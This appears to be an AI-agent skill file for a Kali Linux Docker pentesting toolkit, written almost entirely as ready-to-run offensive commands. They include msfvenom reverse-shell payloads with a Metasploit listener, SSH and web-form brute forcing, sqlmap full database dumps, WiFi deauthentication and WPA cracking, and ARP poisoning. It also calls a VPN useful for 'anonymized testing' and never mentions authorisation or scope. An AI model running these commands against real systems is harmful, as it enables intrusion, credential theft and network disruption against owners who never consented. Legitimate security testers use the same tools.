Comprehensive pentesting toolkit using Kali Linux Docker container. Provides direct access to 200+ security tools without MCP overhead. Use when conducting security assessments, penetration testing, vulnerability scanning, or security research. Works via direct docker exec commands for maximum efficiency.
npx skill4agent add cyb3rdudu/dotfiles kalibash_tool

HOST           CONTAINER
./shared/      <---> /home/kaliuser/shared/
./wordlists/   <---> /home/kaliuser/wordlists/

/home/kaliuser/shared/
./shared/
# Generate timestamp
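# Computed once by the host shell and reused, so every artifact of one run
# carries the same stamp.
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
# Save with timestamp
# The path is quoted and the following heading sits on its own line: a '#'
# glued to the end of a word is not a comment to the shell, so it would have
# become part of the -oA basename together with the words after it.
docker exec kali nmap -sV 192.168.1.1 -oA "/home/kaliuser/shared/nmap_scan_${TIMESTAMP}"
# Create organized directory structure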
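# The brace list is expanded by the host shell (bash/zsh), so mkdir inside the
# container receives one path per tool directory.
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,gobuster,nikto,sqlmap,hydra,john,metasploit,wireless,forensics}
# Save to organized locations
# $(date ...) is not inside single quotes here, so the host expands it and the
# host clock/timezone names the file. Quoting keeps the result a single word.
docker exec kali nmap -sV target.com -oA "/home/kaliuser/shared/nmap/scan_$(date +%Y%m%d_%H%M%S)"
docker exec kali gobuster dir -u http://target.com -w /wordlist -o "/home/kaliuser/shared/gobuster/target_$(date +%Y%m%d_%H%M%S).txt"
FORMAT: {tool}_{target}_{type}_{timestamp}.{ext}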
EXAMPLES:
- nmap_192.168.1.1_full_20260125_143022.xml
- gobuster_example.com_dirs_20260125_143022.txt
- nikto_target.com_vuln_20260125_143022.txt
- hydra_ssh_192.168.1.10_20260125_143022.txt
- john_hashes_cracked_20260125_143022.txt
# Pre-installed wordlists in container:
/usr/share/wordlists/rockyou.txt # Most popular passwords (needs extraction)
/usr/share/wordlists/dirb/common.txt # Common directories
/usr/share/seclists/ # Full SecLists collection
/usr/share/wordlists/metasploit/ # Metasploit wordlists
# Extract rockyou (one-time operation)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
# Use built-in wordlists
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target# Generate custom wordlist and save to mounted volume
docker exec kali crunch 6 8 -o /home/kaliuser/wordlists/custom_6-8.txt
docker exec kali cewl http://target.com -w /home/kaliuser/wordlists/target_words.txt
# Custom wordlists appear in ./wordlists/ on host# Create directory structure
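# The dated directory is created by the container's shell so that it uses the
# same clock and timezone as the scans below. An unquoted $(date ...) on the
# docker exec line is expanded by the host instead; if host and container
# disagree on the date (different TZ, or a run that crosses midnight), -oA
# would point at a directory that was never created.
docker exec kali bash -c 'mkdir -p /home/kaliuser/shared/recon/$(date +%Y%m%d)'
# Host discovery with logging
docker exec kali bash -c 'nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/host_discovery_$(date +%H%M%S)'
# Port scan with logging
docker exec kali bash -c 'nmap -sV -p- 192.168.1.100 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/port_scan_192.168.1.100_$(date +%H%M%S)'
# Create web assessment directory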
docker exec kali mkdir -p /home/kaliuser/shared/web/target.com
# Directory enumeration
docker exec kali gobuster dir -u http://target.com \
-w /usr/share/wordlists/dirb/common.txt \
-o /home/kaliuser/shared/web/target.com/gobuster_$(date +%Y%m%d_%H%M%S).txt
# Nikto scan
docker exec kali nikto -h http://target.com \
-o /home/kaliuser/shared/web/target.com/nikto_$(date +%Y%m%d_%H%M%S).txt
# SQL injection testing
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch \
--output-dir=/home/kaliuser/shared/web/target.com/sqlmap_$(date +%Y%m%d_%H%M%S)# Create password cracking directory
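# Output written here is recovered-credential material and, through the
# ./shared/ mapping, is readable on the host as well.
docker exec kali mkdir -p /home/kaliuser/shared/passwords
# John the Ripper with logging
# The redirect is wrapped in bash -c so that it is performed inside the
# container. A bare `docker exec ... > /home/kaliuser/...` is a redirect of
# the HOST shell, which opens that path on the host filesystem (and fails
# before the tool runs if the path does not exist there).
docker exec kali bash -c 'john /home/kaliuser/shared/passwords/hashes.txt \
  --wordlist=/usr/share/wordlists/rockyou.txt \
  > /home/kaliuser/shared/passwords/john_output_$(date +%Y%m%d_%H%M%S).txt'
# Hydra brute force with logging
# -o is handled by the tool itself, so the file is created in the container.
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  ssh://192.168.1.10 \
  -o "/home/kaliuser/shared/passwords/hydra_ssh_$(date +%Y%m%d_%H%M%S).txt"
# Create wireless directory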
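docker exec kali mkdir -p /home/kaliuser/shared/wireless
# Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF \
  -w "/home/kaliuser/shared/wireless/capture_$(date +%Y%m%d_%H%M%S)" wlan0mon
# Crack WPA
# Wrapped in bash -c: both the capture_*.cap glob and the tee target are
# container paths. Left on the docker exec line, the glob would be matched
# against the host filesystem and tee would run on the host.
docker exec kali bash -c 'aircrack-ng -w /usr/share/wordlists/rockyou.txt \
  /home/kaliuser/shared/wireless/capture_*.cap \
  | tee /home/kaliuser/shared/wireless/crack_result_$(date +%Y%m%d_%H%M%S).txt'
# Create payloads directory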
docker exec kali mkdir -p /home/kaliuser/shared/payloads
# Generate payload and save to shared volume
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f exe \
-o /home/kaliuser/shared/payloads/payload_$(date +%Y%m%d_%H%M%S).exe
# Metasploit resource file logging
docker exec kali bash -c 'echo "spool /home/kaliuser/shared/payloads/msf_session_$(date +%Y%m%d_%H%M%S).log" > /tmp/msf.rc'# View all saved results
ls -lh ./shared/
# View organized by date
tree ./shared/
# Search for specific scan
find ./shared/ -name "*nmap*" -type f
# Archive results
tar -czf pentest_results_$(date +%Y%m%d).tar.gz ./shared/# Nmap
-oN file.txt # Normal output
-oX file.xml # XML output
-oA basename # All formats (recommended)
# Gobuster
-o file.txt # Output to file
# Nikto
-o file.txt # Output to file
# SQLmap
--output-dir=path # Output directory
# Hydra
-o file.txt # Output to file
# John
> file.txt # Redirect stdout
# Aircrack-ng
-w /path/to/file # Output file (for airodump-ng)
# Metasploit
spool file.log # Log session to file# Start with VPN (recommended for anonymized testing)
docker-compose up -d
# Start without VPN (direct connection)
docker-compose up -d kali
# Build from scratch
docker-compose build
# Check status
docker-compose ps./shared//home/kaliuser/shared/./wordlists//home/kaliuser/wordlists/# Execute single command
docker exec kali [tool] [options]
# Interactive shell
docker exec -it kali /bin/bash
# Copy files out
docker cp kali:/home/kaliuser/shared/scan.txt ./output/
# Copy files in
docker cp ./wordlist.txt kali:/home/kaliuser/shared/# Stop container
docker stop kali
# Start existing container
docker start kali
# Remove container
docker rm kali
# View logs
docker logs kali# Basic scan
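# None of the first four commands passes an output flag; their results exist
# only on the terminal.
docker exec kali nmap 192.168.1.1
# Service version detection
docker exec kali nmap -sV 192.168.1.1
# OS detection
docker exec kali nmap -O 192.168.1.1
# Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1
# Save results (ALWAYS use /home/kaliuser/shared/)
# Single quotes hand $(date ...) to the container's bash, so the stamp uses
# the container clock.
docker exec kali bash -c 'nmap -sV -oA /home/kaliuser/shared/nmap_scan_$(date +%Y%m%d_%H%M%S) 192.168.1.0/24'
# Flags listed for this tool (descriptions were lost in extraction):
# -sS -sT -sU -sV -O -A -p- -Pn -T4 -oA
# Scan specific ports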
docker exec kali masscan 192.168.1.0/24 -p80,443,8080
# Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000
# Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /home/kaliuser/shared/masscan.txt# Passive mode
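# NOTE(review): eth0 is the container's interface. On a default bridge
# network, layer-2 discovery only sees the Docker bridge segment, not the
# host's LAN — confirm which network mode the container was started with.
docker exec kali netdiscover -p -i eth0
# Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24
# Two separate commands were fused onto the previous line in the source.
docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24
# Basic scan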
docker exec kali nikto -h http://target.com
# SSL scan
docker exec kali nikto -h https://target.com -ssl
# Save results
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt
# Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde# Default wordlist
docker exec kali dirb http://target.com
# Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt
# Save results
docker exec kali dirb http://target.com -o /home/kaliuser/shared/dirb.txt
# Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt# Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
# DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
# Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt# Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ
# Parameter fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ
# POST data fuzzing
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login# Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"
# POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs
# Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump
# Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all# Basic scan
docker exec kali wpscan --url http://target.com
# Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u
# Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p
# Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe# Basic scan
docker exec kali whatweb http://target.com
# Aggressive mode
docker exec kali whatweb -a 3 http://target.com
# Scan multiple URLs
docker exec kali whatweb -i /home/kaliuser/shared/urls.txt# Crack with default wordlist
docker exec kali john /home/kaliuser/shared/hashes.txt
# Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /home/kaliuser/shared/hashes.txt
# Crack specific format
docker exec kali john --format=raw-md5 /home/kaliuser/shared/hashes.txt
# Show cracked passwords
docker exec kali john --show /home/kaliuser/shared/hashes.txt
# Incremental mode
docker exec kali john --incremental /home/kaliuser/shared/hashes.txt# MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt
# Brute force
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
# Show results
docker exec kali hashcat -m 0 hashes.txt --show# SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
# FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1
# Multiple protocols
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http# SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh
# HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http# Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /home/kaliuser/shared/wordlist.txt
# Custom charset
docker exec kali crunch 4 6 0123456789 -o /home/kaliuser/shared/numbers.txt
# Pattern-based
docker exec kali crunch 8 8 -t pass@@@@ -o /home/kaliuser/shared/pattern.txt# Start monitor mode
docker exec kali airmon-ng start wlan0
# Capture packets
docker exec kali airodump-ng wlan0mon
# Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon
# Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap# Automatic WPA attack
docker exec kali wifite --wpa
# All attack types
docker exec kali wifite
# Specific target
docker exec kali wifite -i wlan0 --killdocker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv# Search all sources
docker exec kali theharvester -d target.com -b all
# Specific source
docker exec kali theharvester -d target.com -b google
# Save results
docker exec kali theharvester -d target.com -b all -f /home/kaliuser/shared/harvest# Standard enumeration
docker exec kali dnsrecon -d target.com
# Zone transfer
docker exec kali dnsrecon -d target.com -a
# Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt# Basic enumeration
docker exec kali sublist3r -d target.com
# Enable brute force
docker exec kali sublist3r -d target.com -b
# Save results
docker exec kali sublist3r -d target.com -o /home/kaliuser/shared/subdomains.txt# Full enumeration
docker exec kali enum4linux -a 192.168.1.1
# User enumeration
docker exec kali enum4linux -U 192.168.1.1
# Share enumeration
docker exec kali enum4linux -S 192.168.1.1# Full scan
docker exec kali dmitry -winsepo /home/kaliuser/shared/dmitry.txt target.com
# Subdomain search
docker exec kali dmitry -s target.com# Start msfconsole
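# -it requests an interactive TTY.
docker exec -it kali msfconsole
# Generate payload
# -o lets the tool create the file inside the container, matching the form
# this page uses in its other examples. A `>` after docker exec is a redirect
# of the host shell and would target a host path.
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /home/kaliuser/shared/payload.exe
# Search exploits
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"
# Run resource script
docker exec kali msfconsole -r /home/kaliuser/shared/script.rc
# Windows reverse shell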
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe
# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk# Start SET
docker exec -it kali setoolkit# Scan for embedded files
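# Read-only scan: lists embedded signatures without writing anything.
docker exec kali binwalk /home/kaliuser/shared/firmware.bin
# Extract files
# NOTE(review): -e writes its extraction tree relative to the working
# directory of the exec'd process, not next to the input file. Pass
# -C <dir> (--directory) if the extracted files should land on the mounted
# volume; otherwise they stay in the container filesystem.
docker exec kali binwalk -e /home/kaliuser/shared/firmware.bin
# Signature scan
docker exec kali binwalk --signature /home/kaliuser/shared/file.bin
# Recover all file types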
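# image.dd is only read; carved files go to a dedicated output directory.
docker exec kali foremost -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/recovered
# Specific file types
# The output directory is a fresh sub-directory rather than the shared root:
# foremost refuses to write into a directory that already has content, and
# the shared root holds every other result. The directory name is
# constructed for this example.
docker exec kali foremost -t jpg,png,pdf -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/recovered_jpg_png_pdf
# Get image info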
docker exec kali volatility -f /home/kaliuser/shared/memory.dump imageinfo
# List processes
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 pslist
# Dump process
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /home/kaliuser/shared/# Basic extraction
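# Wrapped in bash -c so the redirect creates strings.txt inside the container
# (and therefore on the shared volume). Written directly after docker exec,
# `>` belongs to the host shell and targets a host path.
docker exec kali bash -c 'strings /home/kaliuser/shared/binary > /home/kaliuser/shared/strings.txt'
# Minimum length 10
docker exec kali strings -n 10 /home/kaliuser/shared/binary
# Unicode strings
docker exec kali strings -e l /home/kaliuser/shared/binary
# View metadata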
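# Read-only: prints the metadata of one file.
docker exec kali exiftool /home/kaliuser/shared/image.jpg
# Remove all metadata
# NOTE: this rewrites the file (exiftool leaves the previous version next to
# it as image.jpg_original). If the file is evidence, hash it first and run
# this on a copy.
docker exec kali exiftool -all= /home/kaliuser/shared/image.jpg
# Batch process
# The glob is expanded by the container's bash; on the bare docker exec line
# the host shell would try to match *.jpg against a host path.
docker exec kali bash -c 'exiftool /home/kaliuser/shared/*.jpg'
# GUI mode (requires X11 forwarding)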
docker exec -it kali ghidra
# Headless mode
docker exec kali analyzeHeadless /workspace /project -import /home/kaliuser/shared/binary.exe# Open binary
docker exec -it kali r2 /home/kaliuser/shared/binary
# Analyze
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /home/kaliuser/shared/binary"
# Disassemble
docker exec kali r2 -c 'pd 10' /home/kaliuser/shared/binary# Debug binary
docker exec -it kali gdb /home/kaliuser/shared/binary
# With PEDA
docker exec -it kali gdb -q /home/kaliuser/shared/binary# Full audit
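# docker exec runs lynis inside the kali container, so the "system" being
# audited is the container's own filesystem and configuration, not the
# Docker host. Run lynis on the host itself to audit the host.
docker exec kali lynis audit system
# Quick scan
docker exec kali lynis audit system --quick
# Start OpenVAS (requires initialization)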
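# NOTE(review): current Kali packages ship the scanner as GVM and start it
# with gvm-start; check which command the image actually provides.
docker exec kali openvas-start
# Capture on interface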
docker exec kali tcpdump -i eth0
# Capture to file
docker exec kali tcpdump -i eth0 -w /home/kaliuser/shared/capture.pcap
# Read file
docker exec kali tcpdump -r /home/kaliuser/shared/capture.pcap
# Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'# Capture packets
docker exec kali tshark -i eth0
# Capture to file
docker exec kali tshark -i eth0 -w /home/kaliuser/shared/capture.pcap
# Filter display
docker exec kali tshark -r /home/kaliuser/shared/capture.pcap -Y 'http.request'# Text mode
docker exec -it kali ettercap -T -i eth0
# ARP poisoning
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//# Step 1: Discover live hosts
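# -oA takes a basename and writes hosts.nmap, hosts.gnmap and hosts.xml.
docker exec kali nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/hosts
# Step 2: Port scan discovered hosts
# NOTE(review): nothing in step 1 creates hosts.txt. The -iL input below has
# to be prepared separately as a plain list, one address per line, or this
# step fails on a missing file.
docker exec kali nmap -sV -p- -iL /home/kaliuser/shared/hosts.txt -oA /home/kaliuser/shared/ports
# Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /home/kaliuser/shared/services
# Step 1: Identify web technologies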
docker exec kali whatweb http://target.com
# Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /home/kaliuser/shared/dirs.txt
# Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt
# Step 4: Test for SQLi
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch# Step 1: Generate wordlist
docker exec kali crunch 8 12 -t Pass@@@@ -o /home/kaliuser/shared/wordlist.txt
# Step 2: Crack hashes
docker exec kali john --wordlist=/home/kaliuser/shared/wordlist.txt /home/kaliuser/shared/hashes.txt
# Step 3: Network service brute force
docker exec kali hydra -L /home/kaliuser/shared/users.txt -P /home/kaliuser/shared/wordlist.txt ssh://192.168.1.1# Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0
# Step 2: Scan networks
docker exec kali airodump-ng wlan0mon
# Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon
# Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap# Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49
# Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /home/kaliuser/shared/payload.exe
# Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"docker cp# Files are automatically available on both sides:
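# The mount is read-write in both directions: whatever a tool writes under
# /home/kaliuser/shared/ is created on the host filesystem under ./shared/.
# Save in container → Appears in ./shared/ on host immediately
docker exec kali nmap -sV target -oA /home/kaliuser/shared/scan
# Access on host
cat ./shared/scan.nmap
# Add files from host → Available in container immediately
echo "target1.com" > ./shared/targets.txt
docker exec kali cat /home/kaliuser/shared/targets.txt
# Only use docker cp for non-mounted paths
docker cp kali:/tmp/some-file.txt ./
docker cp ./local-file.txt kali:/tmp/
# Wordlist locations listed by the page (fused onto the line above in the source):
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/seclists/
/usr/share/wordlists/metasploit/
# List available wordlists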
docker exec kali find /usr/share/wordlists -type f
# Extract rockyou (if gzipped)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz# Check logs
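# Inspect the container's stdout/stderr before discarding it.
docker logs kali
# Remove and recreate
docker rm kali
# NOTE(review): this docker run passes no -v options. Unless the mounts are
# defined elsewhere, a container recreated this way has no ./shared/ or
# ./wordlists/ mapping, so results written to /home/kaliuser/shared/ stay
# inside the container. Recreating through docker-compose (shown on this
# page) keeps the documented mounts.
docker run -d --name kali kali-comprehensive
# Use host network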
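# --network host removes the container's network namespace: processes in the
# container bind and capture directly on the host's interfaces, and
# published-port filtering no longer applies.
docker run -d --name kali --network host kali-comprehensive
# Add network capabilities
# NET_RAW permits raw/packet sockets and NET_ADMIN permits interface and
# routing changes inside the container's network namespace. With
# --network host that namespace is the host's own, so grant these only to
# runs that need them. Both commands use the same --name, so they are
# alternatives, not a sequence.
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive
# Run as root (already default)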
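# [command] is a placeholder for the tool invocation.
docker exec -u root kali [command]
# Fix workspace permissions
# NOTE(review): mode 777 makes both trees world-writable, and for a
# bind-mounted directory the change applies to the host directory as well.
# Changing ownership to the container user (presumably kaliuser, going by
# the home directory — confirm) is the narrower fix. /workspace and /results
# are also not among the mounts this page documents (./shared/, ./wordlists/);
# confirm these paths exist in the image.
docker exec kali chmod -R 777 /workspace /results
# Initialize database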
docker exec kali service postgresql start
docker exec kali msfdb init
# Check status
docker exec kali msfdb status# ✅ CORRECT - Output saved to shared volume with timestamp
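# Single quotes pass the whole command, including $(date ...), to the
# container's bash, so the file is created on the shared volume.
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)'
# ❌ WRONG - Output not saved (lost on container restart)
docker exec kali nmap -sV target
# ✅ CORRECT - Redirect to shared volume
# The pipe is placed inside bash -c so that tee runs in the container. In
# `docker exec kali whatweb ... | tee /home/kaliuser/...` the pipe belongs to
# the host shell, and tee would write to that path on the host, not to the
# shared volume.
docker exec kali bash -c 'whatweb target.com | tee /home/kaliuser/shared/whatweb_$(date +%Y%m%d_%H%M%S).txt'
# Standard output flags (always use /home/kaliuser/shared/)
-o /home/kaliuser/shared/file_$(date +%Y%m%d_%H%M%S).txt # Generic output
-oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S) # Nmap: all formats
-w /home/kaliuser/shared/capture_$(date +%Y%m%d_%H%M%S).pcap # Capture files
# Create directory structure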
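# Created by the container's bash so the dated directory uses the same clock
# as the scan below. Expanded on the host, the date could differ from the
# container's and -oA would point at a directory that does not exist.
docker exec kali bash -c 'mkdir -p /home/kaliuser/shared/{nmap,web,passwords,wireless,exploitation}/$(date +%Y%m%d)'
# Save to organized locations
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/nmap/$(date +%Y%m%d)/scan_$(date +%H%M%S)'
# Paths referenced by the page (fused onto the line above in the source):
./shared/
/home/kaliuser/shared/
./wordlists/
/home/kaliuser/wordlists/
/usr/share/wordlists/
# Stop monitor mode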
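# Takes the monitor-mode interface down again.
docker exec kali airmon-ng stop wlan0mon
# Clear temporary files
# The glob must be expanded by the container's shell. On the bare docker
# exec line the HOST shell expands /tmp/* against the host's /tmp and passes
# those names to rm in the container, so the container's temp files are not
# the ones removed.
docker exec kali bash -c 'rm -rf /tmp/*'
# Archive results
# Same reason for bash -c: *.txt has to match files in the container.
# NOTE(review): this pattern only picks up top-level .txt files. Results in
# sub-directories (nmap/, web/, ...) and other formats (.xml, .gnmap, .pcap)
# are not included. The archive also contains any recovered credentials, so
# store it accordingly.
docker exec kali bash -c 'tar -czf /home/kaliuser/shared/assessment-$(date +%Y%m%d).tar.gz /home/kaliuser/shared/*.txt'
# Quick-reference commands (fused onto the line above in the source):
docker exec kali nmap -sV -p- target
docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
docker exec kali sqlmap -u "http://target/page?id=1" --batch
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
docker exec kali hydra -l admin -P passwords.txt ssh://target
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap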